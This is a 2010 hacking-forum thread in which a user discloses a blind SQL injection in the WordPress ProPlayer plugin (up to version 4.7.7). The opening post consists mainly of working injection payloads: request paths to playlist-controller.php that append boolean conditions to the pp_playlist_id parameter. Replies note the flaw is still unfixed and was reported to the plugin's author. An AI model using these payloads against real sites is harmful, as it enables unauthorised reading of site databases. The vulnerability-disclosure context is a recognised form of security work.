EvilZone
Welcome,
Guest
. Please
login
or
register
.
1 Hour
1 Day
1 Week
1 Month
Forever
Login with username, password and session length
News:
Home
Help
Search
Login
Register
EvilZone
»
Hacking and Security
»
Hacking and Security
(Moderator:
RedBullAddicted
) »
WP-ProPlayer Plugin Blind SQL Injection
Print
Pages: [
1
]
Author
Topic: WP-ProPlayer Plugin Blind SQL Injection (Read 3277 times)
0 Members and 1 Guest are viewing this topic.
ca0s
VIP
Sir
Posts: 432
Cookies: 53
WP-ProPlayer Plugin Blind SQL Injection
«
on:
December 11, 2010, 11:09:09 pm »
<-------
WP-ProPlayer Blind SQL Inyection
Founder: Ca0s
Visit:
st4ck-3rr0r.blogspot.com
ka0-labs.org
Shouts @
evilzone.org
elhacker.net
diosdelared.com
------->
<-------
Software: ProPlayer <= 4.7.7
URL:
http://wordpress.org/extend/plugins/proplayer/
http://isagoksu.com/proplayer-wordpress-plugin/
Vuln: Blind SQL Inyection ->
/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b
Note: some servers filter ' to %27 so wont work this way.
------->
Report to moderator
Logged
ca0s @
ka0labs
ande
Owner
Titan
Posts: 2664
Cookies: 256
Re: WP-ProPlayer Plugin Blind SQL Injection
«
Reply #1 on:
December 12, 2010, 12:06:11 am »
Vulnerability status? I couldn't find any fix notes on their site.
Report to moderator
Logged
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true
ca0s
VIP
Sir
Posts: 432
Cookies: 53
Re: WP-ProPlayer Plugin Blind SQL Injection
«
Reply #2 on:
December 12, 2010, 12:58:06 am »
Unfixed.
I reported it to author.
Report to moderator
Logged
ca0s @
ka0labs
ande
Owner
Titan
Posts: 2664
Cookies: 256
Re: WP-ProPlayer Plugin Blind SQL Injection
«
Reply #3 on:
December 12, 2010, 01:04:08 am »
Quote from: ca0s on December 12, 2010, 12:58:06 am
Unfixed.
I reported it to author.
Sweet, better hope they fix it quick
Report to moderator
Logged
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true
solar
NULL
Posts: 1
Cookies: 0
Re: WP-ProPlayer Plugin Blind SQL Injection
«
Reply #4 on:
February 25, 2011, 07:24:13 pm »
Cool... nice find.
Report to moderator
Logged
Print
Pages: [
1
]
EvilZone
»
Hacking and Security
»
Hacking and Security
(Moderator:
RedBullAddicted
) »
WP-ProPlayer Plugin Blind SQL Injection